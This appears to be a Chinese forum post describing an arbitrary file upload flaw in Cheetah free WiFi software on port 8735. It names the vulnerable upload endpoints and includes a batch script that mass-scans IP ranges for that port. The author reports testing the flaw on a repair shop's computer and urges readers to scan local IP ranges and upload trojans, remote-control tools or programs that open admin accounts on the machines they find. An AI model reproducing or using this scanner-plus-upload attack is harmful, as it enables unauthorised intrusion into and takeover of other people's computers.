你敢用猎豹WIFI 我就敢入侵你的电脑

漏洞详情：

当猎豹wifi运行后会向外网开放8735端口（运行web），而其某接口存在漏洞导致任意文件上传，从而导致pc机沦陷。

http://电脑的IP:8735/tool/#upload

http://电脑的IP/api/replypic 存在漏洞导致任意文件上传

漏洞危害：

默认装C盘 可以实现挂马，指定入侵，拓展大企业内网监控pc机等。

 昨天去电脑维修店修电脑。发现他的电脑开的猎豹WIFI ，我就做了个简单的测试。
  前几天在乌云看到某大神说的漏洞就试了一下，如图：






 就这样简单：我做出了一个简单的猜想可以更多的入侵更多的电脑：
 
用3389端口扫描器更改扫描端口为8735 源代码为：

@echo off

color a

@del s.txt /q

@title 全黑8735端口扫描 by：全黑哥  QQ19894287

if not exist "IPs.txt" goto 1111

goto 11ss

:1111

echo 192.168.0.1 192.168.0.255（输入前先把现在这行文字删掉,请保留版权 by:全黑哥 19894287）>IPs.txt

call IPs.txt

:SSYY

cls

:11ss

for /f "eol= tokens=1,2 delims= " %%i in (IPs.txt) do s SYN %%i %%j 8735 /save

@del Result.txt /p 

整理一下你们当地纯真IP，然后在服务器上面扫一下 出来的8735端口的99%都是在用猎豹免费WIFI的用户

  然后连接上传你的木马远控也好  是提权开启管理帐号的程序也罢

    最后衷心希望各位大大多多的关注